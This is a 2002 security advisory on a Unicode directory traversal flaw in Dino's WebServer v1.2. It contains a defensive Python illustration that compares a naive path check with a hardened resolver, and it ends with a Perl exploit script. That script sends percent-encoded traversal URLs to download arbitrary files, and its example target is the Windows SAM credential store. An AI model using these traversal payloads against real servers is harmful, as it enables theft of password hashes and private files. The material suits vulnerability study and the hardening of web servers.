Dino's WebServer v1.2 Unicode Directory Traversal Vulnerability

Type

File Disclosure

Release Date

August 10, 2002

Product / Vendor

Dino's Webserver is a small and very simple-to-use web server intended to let you set up a quick and basic web server to serve a home page from your local computer. It includes a log function as well as a simple web hit counter with different design styles to choose from. All it requires is the IP address of your machine, the web directory and the port to use. The program is intended for casual home usage only.

Summary

Due to a vulnerability in Dino's web server v1.2, it is possible to bypass the URL security check and manipulate files on the remote host. In this attack we exploit this vulnerability and then use it to download any file from the remote machine. This would potentially enable a malicious user who visited the web site to obtain private files and information from the machine.

This exploit works by an attacker constructing a URL that causes Dino's web server to navigate to any desired folder on the same logical drive and access the files in it. This is achieved by using the URL-encoded (Unicode) representations of "/" and "\", which pass the server's check for ".." sequences but are still decoded into path separators when the path is resolved. This allows a user to traverse to any directory on the same logical drive as the web application. In addition, unauthenticated users can issue the GET request shown in the exploit below against these directories.
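The following Python script is an added illustration, not part of this advisory and not code from Dino's Webserver, of why the check described above fails and how a resolver should be written instead. It contrasts a naive check that looks for literal ".." segments in the raw request path with a hardened resolver that fully percent-decodes the path (repeating to defeat double encoding), requires strict UTF-8 (so overlong forms such as %c0%af are refused), folds backslashes, normalizes the result and confirms it stays under the web root. The web root and the request paths are constructed for the example; only the "encoded" request follows the shape of the URL built by the exploit below.

```python
import posixpath
from typing import Dict, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed web root for the example; the advisory does not name one.
WEB_ROOT = "/srv/www/htdocs"

# Constructed request paths. "encoded" mirrors the shape of the URL the
# advisory's exploit builds (a percent-encoded separator before each "..");
# the others are further encodings a resolver has to handle.
REQUESTS = {
    "plain":     "/index.html",
    "encoded":   "/%2f..%2f..%2f../winnt/repair/sam",
    "double":    "/%252e%252e/%252e%252e/boot.ini",
    "overlong":  "/..%c0%af..%c0%afwinnt/win.ini",
    "backslash": "/..%5c..%5cwinnt%5cwin.ini",
}


def naive_check(url_path: str) -> bool:
    """A check of the kind the advisory describes as bypassed: it inspects
    the raw request path and rejects any segment that is literally "..".
    Encoded separators hide the ".." inside a single segment, so every
    encoded traversal passes. Returns True when the path is admitted."""
    segments = url_path.replace("\\", "/").split("/")
    return ".." not in segments


def decode_request_path(url_path: str) -> str:
    """Percent-decode until the string stops changing (defeats double
    encoding), require strict UTF-8 (rejects overlong bytes such as
    %c0%af), and fold backslashes into forward slashes."""
    raw = url_path
    for _ in range(4):
        # strict UTF-8 decoding raises UnicodeDecodeError on overlong forms
        decoded = unquote_to_bytes(raw).decode("utf-8")
        if decoded == raw:
            break
        raw = decoded
    else:
        raise ValueError("too many encoding layers")
    return raw.replace("\\", "/")


def resolve_safely(url_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map a request path to a filesystem path inside root, or return None
    when the request cannot be served because it escapes the root."""
    try:
        decoded = decode_request_path(url_path)
    except (UnicodeDecodeError, ValueError):
        return None
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if joined != root and not joined.startswith(root + "/"):
        return None
    return joined


def audit(requests: Dict[str, str] = REQUESTS) -> Dict[str, Tuple[bool, Optional[str]]]:
    """For each request: does the naive check admit it, and what does the
    hardened resolver map it to (None means refused)."""
    return {name: (naive_check(p), resolve_safely(p)) for name, p in requests.items()}


if __name__ == "__main__":
    for name, (naive_ok, resolved) in audit().items():
        print(f"{name:10s} naive={'pass' if naive_ok else 'block'}  hardened={resolved}")
```

Run as-is, the naive check admits all five requests, while the hardened resolver serves only "index.html" from the web root and refuses the four traversal attempts. Decoding before checking, rather than checking the raw URL, is the whole fix: the comparison must be made against the same string the filesystem will see.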

Exploit

==================== SNIP ====================

#!/usr/bin/perl -w
use strict;

die "\nDino's Webserver Unicode Directory Traversal / SecurityOffice\n\nUsage: $0 <host> <directory> <file> / Example: $0 www.target.com /winnt/repair/ sam\n\n" if $#ARGV < 2;

print get($ARGV[0], $ARGV[1], $ARGV[2]);

exit 0;

# Fetch $file from $directory on $host through the encoded-traversal URL.
sub get {
    my ($host, $directory, $file) = @_;

    # Each "%2f.." is a percent-encoded "/.." that the server's URL check
    # does not catch before the path is resolved.
    system "lynx $host/%2f..%2f..%2f..$directory$file";

    return "File $file Download Completed!\n\n";
}

==================== SNIP ====================

Tested

Windows 2000 / Dino's web server v1.2

Vulnerable

Dino's web server v1.2 (other versions may also be affected)

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net